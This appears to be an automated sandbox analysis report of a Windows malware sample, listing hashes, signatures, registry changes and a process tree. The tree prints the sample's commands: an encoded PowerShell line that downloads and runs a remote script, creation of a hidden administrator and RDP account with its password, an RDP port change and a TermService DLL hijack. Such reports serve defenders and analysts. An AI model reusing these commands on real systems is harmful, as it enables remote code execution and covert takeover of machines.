Analysis
-
max time kernel
69s -
max time network
113s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
21-07-2021 08:34
Static task
static1
Behavioral task
behavioral1
Sample
exe1.bin.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
exe1.bin.exe
Resource
win10v20210408
General
-
Target
exe1.bin.exe
-
Size
4.6MB
-
MD5
eaee663dfeb2efcd9ec669f5622858e2
-
SHA1
2b96f0d568128240d0c53b2a191467fde440fd93
-
SHA256
6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
-
SHA512
211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 15 988 powershell.exe 17 988 powershell.exe 18 988 powershell.exe 19 988 powershell.exe 21 988 powershell.exe 23 988 powershell.exe 25 988 powershell.exe 27 988 powershell.exe 29 988 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 856 856 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICCB0.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICC9E.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICC8E.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wobmdb31.gme.ps1 powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_nt3aplsh.zvn.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICC1F.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICCAF.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3756 powershell.exe 3756 powershell.exe 3756 powershell.exe 2108 powershell.exe 2108 powershell.exe 2108 powershell.exe 3696 powershell.exe 3696 powershell.exe 3696 powershell.exe 3964 powershell.exe 3964 powershell.exe 3964 powershell.exe 3756 powershell.exe 3756 powershell.exe 3756 powershell.exe 988 powershell.exe 988 powershell.exe 988 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 612 612 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3756 powershell.exe Token: SeDebugPrivilege 2108 powershell.exe Token: SeIncreaseQuotaPrivilege 2108 powershell.exe Token: SeSecurityPrivilege 2108 powershell.exe Token: SeTakeOwnershipPrivilege 2108 powershell.exe Token: SeLoadDriverPrivilege 2108 powershell.exe Token: SeSystemProfilePrivilege 2108 powershell.exe Token: SeSystemtimePrivilege 2108 powershell.exe Token: SeProfSingleProcessPrivilege 2108 powershell.exe Token: SeIncBasePriorityPrivilege 2108 powershell.exe Token: SeCreatePagefilePrivilege 2108 powershell.exe Token: SeBackupPrivilege 2108 powershell.exe Token: SeRestorePrivilege 2108 powershell.exe Token: SeShutdownPrivilege 2108 powershell.exe Token: SeDebugPrivilege 2108 powershell.exe Token: SeSystemEnvironmentPrivilege 2108 powershell.exe Token: SeRemoteShutdownPrivilege 2108 powershell.exe Token: SeUndockPrivilege 2108 powershell.exe Token: SeManageVolumePrivilege 2108 powershell.exe Token: 33 2108 powershell.exe Token: 34 2108 powershell.exe Token: 35 2108 powershell.exe Token: 36 2108 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeIncreaseQuotaPrivilege 3696 powershell.exe Token: SeSecurityPrivilege 3696 powershell.exe Token: SeTakeOwnershipPrivilege 3696 powershell.exe Token: SeLoadDriverPrivilege 3696 powershell.exe Token: SeSystemProfilePrivilege 3696 powershell.exe Token: SeSystemtimePrivilege 3696 powershell.exe Token: SeProfSingleProcessPrivilege 3696 powershell.exe Token: SeIncBasePriorityPrivilege 3696 powershell.exe Token: SeCreatePagefilePrivilege 3696 powershell.exe Token: SeBackupPrivilege 3696 powershell.exe Token: SeRestorePrivilege 3696 powershell.exe Token: SeShutdownPrivilege 3696 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeSystemEnvironmentPrivilege 3696 powershell.exe Token: SeRemoteShutdownPrivilege 3696 powershell.exe Token: SeUndockPrivilege 3696 powershell.exe Token: SeManageVolumePrivilege 3696 powershell.exe Token: 33 3696 powershell.exe Token: 34 3696 powershell.exe Token: 35 3696 powershell.exe Token: 36 3696 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeIncreaseQuotaPrivilege 3964 powershell.exe Token: SeSecurityPrivilege 3964 powershell.exe Token: SeTakeOwnershipPrivilege 3964 powershell.exe Token: SeLoadDriverPrivilege 3964 powershell.exe Token: SeSystemProfilePrivilege 3964 powershell.exe Token: SeSystemtimePrivilege 3964 powershell.exe Token: SeProfSingleProcessPrivilege 3964 powershell.exe Token: SeIncBasePriorityPrivilege 3964 powershell.exe Token: SeCreatePagefilePrivilege 3964 powershell.exe Token: SeBackupPrivilege 3964 powershell.exe Token: SeRestorePrivilege 3964 powershell.exe Token: SeShutdownPrivilege 3964 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeSystemEnvironmentPrivilege 3964 powershell.exe Token: SeRemoteShutdownPrivilege 3964 powershell.exe Token: SeUndockPrivilege 3964 powershell.exe Token: SeManageVolumePrivilege 3964 powershell.exe Token: 33 3964 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
exe1.bin.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 992 wrote to memory of 3756 992 exe1.bin.exe powershell.exe PID 992 wrote to memory of 3756 992 exe1.bin.exe powershell.exe PID 3756 wrote to memory of 3820 3756 powershell.exe csc.exe PID 3756 wrote to memory of 3820 3756 powershell.exe csc.exe PID 3820 wrote to memory of 3872 3820 csc.exe cvtres.exe PID 3820 wrote to memory of 3872 3820 csc.exe cvtres.exe PID 3756 wrote to memory of 2108 3756 powershell.exe powershell.exe PID 3756 wrote to memory of 2108 3756 powershell.exe powershell.exe PID 3756 wrote to memory of 3696 3756 powershell.exe powershell.exe PID 3756 wrote to memory of 3696 3756 powershell.exe powershell.exe PID 3756 wrote to memory of 3964 3756 powershell.exe powershell.exe PID 3756 wrote to memory of 3964 3756 powershell.exe powershell.exe PID 3756 wrote to memory of 996 3756 powershell.exe reg.exe PID 3756 wrote to memory of 996 3756 powershell.exe reg.exe PID 3756 wrote to memory of 856 3756 powershell.exe reg.exe PID 3756 wrote to memory of 856 3756 powershell.exe reg.exe PID 3756 wrote to memory of 1136 3756 powershell.exe reg.exe PID 3756 wrote to memory of 1136 3756 powershell.exe reg.exe PID 3756 wrote to memory of 4064 3756 powershell.exe net.exe PID 3756 wrote to memory of 4064 3756 powershell.exe net.exe PID 4064 wrote to memory of 2160 4064 net.exe net1.exe PID 4064 wrote to memory of 2160 4064 net.exe net1.exe PID 3756 wrote to memory of 3804 3756 powershell.exe cmd.exe PID 3756 wrote to memory of 3804 3756 powershell.exe cmd.exe PID 3804 wrote to memory of 3740 3804 cmd.exe cmd.exe PID 3804 wrote to memory of 3740 3804 cmd.exe cmd.exe PID 3740 wrote to memory of 4020 3740 cmd.exe net.exe PID 3740 wrote to memory of 4020 3740 cmd.exe net.exe PID 4020 wrote to memory of 2952 4020 net.exe net1.exe PID 4020 wrote to memory of 2952 4020 net.exe net1.exe PID 3756 wrote to memory of 800 3756 powershell.exe cmd.exe PID 3756 wrote to memory of 800 3756 powershell.exe cmd.exe PID 800 wrote to memory of 3872 800 cmd.exe cmd.exe PID 800 wrote to memory of 3872 800 cmd.exe cmd.exe PID 3872 wrote to memory of 2664 3872 cmd.exe net.exe PID 3872 wrote to memory of 2664 3872 cmd.exe net.exe PID 2664 wrote to memory of 996 2664 net.exe net1.exe PID 2664 wrote to memory of 996 2664 net.exe net1.exe PID 2164 wrote to memory of 2524 2164 cmd.exe net.exe PID 2164 wrote to memory of 2524 2164 cmd.exe net.exe PID 2524 wrote to memory of 3820 2524 net.exe net1.exe PID 2524 wrote to memory of 3820 2524 net.exe net1.exe PID 3988 wrote to memory of 3960 3988 cmd.exe net.exe PID 3988 wrote to memory of 3960 3988 cmd.exe net.exe PID 3960 wrote to memory of 1800 3960 net.exe net1.exe PID 3960 wrote to memory of 1800 3960 net.exe net1.exe PID 488 wrote to memory of 760 488 cmd.exe net.exe PID 488 wrote to memory of 760 488 cmd.exe net.exe PID 760 wrote to memory of 2304 760 net.exe net1.exe PID 760 wrote to memory of 2304 760 net.exe net1.exe PID 2208 wrote to memory of 3760 2208 cmd.exe net.exe PID 2208 wrote to memory of 3760 2208 cmd.exe net.exe PID 3760 wrote to memory of 2472 3760 net.exe net1.exe PID 3760 wrote to memory of 2472 3760 net.exe net1.exe PID 2040 wrote to memory of 4064 2040 cmd.exe net.exe PID 2040 wrote to memory of 4064 2040 cmd.exe net.exe PID 4064 wrote to memory of 3840 4064 net.exe net1.exe PID 4064 wrote to memory of 3840 4064 net.exe net1.exe PID 1800 wrote to memory of 2688 1800 cmd.exe net.exe PID 1800 wrote to memory of 2688 1800 cmd.exe net.exe PID 2688 wrote to memory of 4020 2688 net.exe net1.exe PID 2688 wrote to memory of 4020 2688 net.exe net1.exe PID 488 wrote to memory of 3236 488 cmd.exe WMIC.exe PID 488 wrote to memory of 3236 488 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jyeo3nuu\jyeo3nuu.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6EAE.tmp" "c:\Users\Admin\AppData\Local\Temp\jyeo3nuu\CSC4762A988122240899875C337F811747.TMP"4⤵PID:3872
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:996
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:856 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1136
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2160
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2952
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:996
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2224
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1568
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3820
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc tS5KLwJL /add1⤵
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc tS5KLwJL /add2⤵
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc tS5KLwJL /add3⤵PID:1800
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:488 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:2304
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:2472
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:3840
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc tS5KLwJL1⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc tS5KLwJL2⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc tS5KLwJL3⤵PID:4020
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:488 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:3236
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3760
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
PID:1568
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2188
-
